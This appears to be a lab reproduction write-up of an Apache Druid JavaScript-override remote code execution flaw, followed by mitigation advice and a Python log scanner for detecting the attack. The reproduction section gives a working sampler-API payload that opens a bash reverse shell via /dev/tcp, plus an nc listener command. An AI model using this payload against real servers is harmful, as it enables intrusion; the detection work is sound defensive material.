0x01 Vulnerability overview
Apache Druid is an open-source, column-oriented distributed database written in Java and maintained by the Apache Software Foundation. Druid can execute user-supplied JavaScript embedded in several kinds of requests; the feature is meant for high-trust deployments and is disabled by default. The vulnerable release and earlier versions contain an access-control flaw: an authenticated user can send a crafted request that forces Druid to run user-supplied JavaScript for that request regardless of the server configuration, and thereby execute arbitrary code with the privileges of the Druid server process.
0x02 Affected versions
The vulnerable release and all earlier versions.
0x03 Environment setup
The lab uses Docker. After installing Docker, pull the image:
docker pull fokkodriesprong/docker-druid
Start the container, exposing the console port:
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
The Druid web console is then reachable on port 8888 of the Docker host.
0x04 Reproduction
3. In the data loader form on the right, fill in:
Base directory: quickstart/tutorial/
File filter:
Continue through the loader until the Filter step, then open Burp Suite Pro and intercept the request the console sends. The loader posts the ingestion spec to the sampler API (POST /druid/indexer/v1/sampler), and it is this spec that carries the payload.
Replace the request body with the spec below. The transformSpec filter is of type "javascript": its function reaches java.lang.Runtime.getRuntime().exec() through the Java bridge of the embedded JavaScript engine, and the extra "" key holding {"enabled": "true"} overrides the server-side JavaScript configuration for this one request, so the function runs even though JavaScript is disabled in the server config. The command is written as /bin/bash -c $@|bash 0 echo ... because Runtime.exec() splits its string on whitespace with no shell parsing: bash -c receives $@|bash as its script, 0 becomes $0 and the remaining words become $@, so the script expands to echo bash -i >&/dev/tcp/your_ip/6669 0>&1 | bash and the inner bash interprets the redirections intact. Note that the function is evaluated once per input row, so the file filter must select at least one file under the base directory for it to execute at all.
{
  "type": "index",
  "spec": {
    "type": "index",
    "ioConfig": {
      "type": "index",
      "firehose": {"type": "local", "baseDir": "quickstart/tutorial/", "filter": ""}
    },
    "dataSchema": {
      "dataSource": "sample",
      "parser": {
        "type": "string",
        "parseSpec": {
          "format": "json",
          "timestampSpec": {"column": "time", "format": "iso"},
          "dimensionsSpec": {}
        }
      },
      "transformSpec": {
        "transforms": [],
        "filter": {
          "type": "javascript",
          "function": "function(value){java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/your_ip/6669 0>&1')}",
          "dimension": "added",
          "": {"enabled": "true"}
        }
      }
    }
  },
  "samplerConfig": {"numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214"}
}
6. Test by bouncing a shell straight back: on the attacker machine, start a listener on the port used in the payload:
nc -lvp 6669
8. The reverse shell connects back to the attacker machine once the sampler evaluates the filter against the input rows.
0x05 Mitigation
Upgrade Druid to the latest version. Because the payload enables JavaScript per request, leaving druid.javascript.enabled=false (the default) does not protect an unpatched server; until the upgrade is done, limit which authenticated users can reach the ingestion and sampler APIs.
The vendor has released a patch that fixes the vulnerability; patch link:
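Besides upgrading, a practitioner will want to spot attempts in captured traffic. The following is an added example, not part of the writeup or of the Druid project: it walks captured request bodies and reports every javascript-typed object at any depth, a function body that calls Runtime.exec, and the per-request enable override the payload above depends on. It generalizes beyond the page's filter case, since javascript objects can also appear as query filters, extraction functions, aggregators or transforms. The log lines are constructed here in a simple "timestamp method path body" format that is an assumption, not a Druid log format.

```python
"""
Added example (not code from the writeup or from the Druid project): scan
captured request bodies for JavaScript use and for the per-request enable
override carried by the payload above.

Assumptions: log lines are constructed here in a simple
'<timestamp> <method> <path> <json body>' format (not a Druid log format);
paths and bodies are samples.
"""
import json
import re

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>\{.*\})$")

# Constructed samples: line 1 has the exploit shape, line 2 is a benign sampler
# request, line 3 a query that uses a javascript filter without the override.
SAMPLE_LOG = [
    '2021-02-01T10:00:01Z POST /druid/indexer/v1/sampler '
    '{"type":"index","spec":{"type":"index","dataSchema":{"dataSource":"sample",'
    '"transformSpec":{"filter":{"type":"javascript",'
    '"function":"function(value){java.lang.Runtime.getRuntime().exec(\'id\')}",'
    '"dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500}}',
    '2021-02-01T10:00:05Z POST /druid/indexer/v1/sampler '
    '{"type":"index","spec":{"type":"index","dataSchema":{"dataSource":"sample",'
    '"transformSpec":{"filter":{"type":"selector","dimension":"added","value":"1"}}}},'
    '"samplerConfig":{"numRows":500}}',
    '2021-02-01T10:00:09Z POST /druid/v2 '
    '{"queryType":"timeseries","dataSource":"wikipedia",'
    '"filter":{"type":"javascript","dimension":"channel",'
    '"function":"function(x){return x==\'#en.wikipedia\'}"},'
    '"intervals":["2015-09-12/2015-09-13"]}',
]


def find_javascript(node, path="$"):
    """Walk a decoded JSON document and return (json_path, reason) tuples.
    A javascript-typed object is reported wherever it appears (filter,
    extractionFn, aggregator, transform ...); its function body is checked
    for Runtime.exec, and any sibling object of the form {"enabled": "true"}
    is reported as an inline enable override."""
    findings = []
    if isinstance(node, dict):
        if node.get("type") == "javascript":
            findings.append((path, "javascript-typed object"))
            function = str(node.get("function", ""))
            if "java.lang.Runtime" in function or ".exec(" in function:
                findings.append((path + ".function", "calls Runtime.exec"))
            if any(isinstance(v, dict) and str(v.get("enabled")).lower() == "true"
                   for v in node.values()):
                findings.append((path, "inline JavaScript enable override"))
        for key, value in node.items():
            findings.extend(find_javascript(value, f"{path}.{key or repr(key)}"))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            findings.extend(find_javascript(item, f"{path}[{i}]"))
    return findings


def scan_log(lines):
    """Parse each line, decode the body and collect findings.  Severity is
    'high' when the override or Runtime.exec is present, otherwise 'info'
    (JavaScript may be legitimately enabled in a high-trust deployment)."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LINE_RE.match(line)
        if not match:
            continue
        try:
            body = json.loads(match.group("body"))
        except json.JSONDecodeError:
            continue
        findings = find_javascript(body)
        if findings:
            high = any("override" in reason or "exec" in reason for _, reason in findings)
            hits.append({"line": number, "path": match.group("path"),
                         "severity": "high" if high else "info", "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["line"], hit["severity"], hit["path"])
        for json_path, reason in hit["findings"]:
            print("   ", json_path, "-", reason)
```

The walk is deliberately type-based rather than path-based: a fixed path such as spec.dataSchema.transformSpec.filter would miss the same object nested inside an "and"/"or" filter, a transform or a query, which is why the override check looks at siblings of the javascript object rather than at a known key.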